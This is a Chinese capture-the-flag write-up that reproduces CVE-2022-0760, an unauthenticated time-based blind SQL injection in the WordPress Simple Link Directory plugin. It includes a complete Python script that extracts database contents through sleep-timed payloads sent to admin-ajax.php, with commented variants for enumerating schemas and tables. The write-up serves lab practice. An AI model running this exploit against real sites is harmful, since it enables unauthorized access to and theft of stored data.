CVE-2022-0760 漏洞复现

CVE-2022-0760

NSS [HNCTF 2022 WEEK2]ohmywordpress

【CVE-2022-0760】

题目描述:flag在数据库里面。

开题:

顺着按钮一直点下去会发现出现一个按钮叫安装WordPress

安装完之后的界面,有一个搜索框。

F12看看network。

又出现了这个WordPress,从源码中看出版本是6.0.2

网上一番搜索,找到一个cve,CVE-2022-0760。当WordPress的插件Simple Link Directory版本 < 7.7.2时候存在时间盲注。

查看源码,这里确实运用的这个插件,但是看不到版本。

估计就是这个CVE,那就直接上盲注脚本。

python 复制代码
import requests
import time


url = "http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.php"

result = ""
for i in range(1, 100):
    length = len(result)
    for o in range(32, 128):

        data = {
            "action": "qcopd_upvote_action",
            # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",
            # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)",
            "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",
        }

        time1 = time.time()

        res = requests.post(url, data=data)

        time2 = time.time()

        # print(time2 - time1)
        # exit()

        if time2 - time1 > 3:
            result += chr(o)
            print(result)
            break

    if len(result) == length:
        break

为什么这样写脚本,漏洞利用在下面文章里面能找到。

参考文章:

NSFOCUS绿盟科技

Simple Link Directory \< 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)\](

相关推荐
go_to_hacker2 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
网络安全工程师老王6 小时前
Java Agent 注入 WebSocket 篇
websocket·网络安全·信息安全·渗透测试
AI拉呱_6 小时前
医院行业等保2.0案例
安全·web安全
2301_810154557 小时前
纯真社区IP库离线版发布更新
web安全
帅云毅10 小时前
文件上传--解析漏洞和编辑器
笔记·学习·安全·web安全·编辑器·php
云天徽上11 小时前
【数据可视化-27】全球网络安全威胁数据可视化分析(2015-2024)
人工智能·安全·web安全·机器学习·信息可视化·数据分析
hnlucky19 小时前
CentOS 7 系统中,防火墙要怎么使用?
linux·运维·网络·网络安全·centos
墨北x1 天前
网络安全职业技能大赛Server2003
安全·web安全
ALe要立志成为web糕手1 天前
create_function()漏洞利用
安全·web安全·网络安全·php·rce
K.A.L1 天前
熊海CMS Cookie脆弱
web安全